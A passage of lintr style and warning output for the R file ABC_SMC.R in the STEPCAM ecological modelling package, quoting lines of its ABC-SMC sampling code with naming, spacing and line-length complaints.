^~~~~~~~\n```\n[R/ABC_SMC.R:119:5:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- d[, 2]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:120:5:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L120) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- d[, 3]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:125:11:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L125) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:125:31:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L125) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n                              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:5:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L143) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L144) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L144) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:12:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:29:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L156) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:35:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:159:45:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                            ^~~~~~~~\n```\n[R/ABC_SMC.R:159:55:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                                      ^~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L160) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:188:20:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L188) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:20:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L188) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L190) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:195:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L195) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:196:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L196) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:197:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L197) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L198) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:200:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L200) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L203) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L205) *style:* **lines should not be more than 80 characters.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:14:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:14:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L205) *warning:* **no visible global function definition for ‘calculateDistance’**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:9:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:27:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:9:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:210:18:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:9:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:211:18:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:9:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:212:18:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:14:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n        ^~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:9:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:216:16:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:9:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:217:16:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:218:9:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n        ^~~~~~\n```\n[R/ABC_SMC.R:218:16:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:11:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:23:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:39:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L221) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] = 1\n                                      ^\n```\n[R/ABC_SMC.R:223:11:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:23:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:39:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L223) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] =\n                                      ^\n```\n[R/ABC_SMC.R:224:13:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:53:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:224:63:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                              ^~~~~~~~\n```\n[R/ABC_SMC.R:225:29:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            compVals, weights)\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:228:13:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L228) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:228:14:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:228:34:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:234:21:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L234) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:234:22:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L234) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:236:13:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:236:38:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:247:5:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:247:17:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:248:5:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:248:17:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:249:5:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:249:17:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:250:16:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    weights <- nextWeights\n               ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:21:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                    ^~~~~~~~\n```\n[R/ABC_SMC.R:252:31:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                              ^~~~~~~~\n```\n[R/ABC_SMC.R:252:41:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:252:51:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                                  ^~~~~~~\n```\n[R/ABC_SMC.R:253:21:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                    ^~~~~~\n```\n[R/ABC_SMC.R:253:29:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                            ^~~~~~\n```\n[R/ABC_SMC.R:253:37:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                                    ^~~~~~\n```\n[R/ABC_SMC.R:254:54:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L254) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:257:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L257) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:19:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                  ^~~~~~~~\n```\n[R/ABC_SMC.R:257:35:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:257:51:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:258:9:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:258:32:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L258) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:258:37:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                                    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:5:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n    ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:26:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L261) *style:* **Commas should always have a space after.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^\n```\n[R/ABC_SMC.R:261:26:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:5:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:262:19:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:5:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:263:19:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:5:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L264) 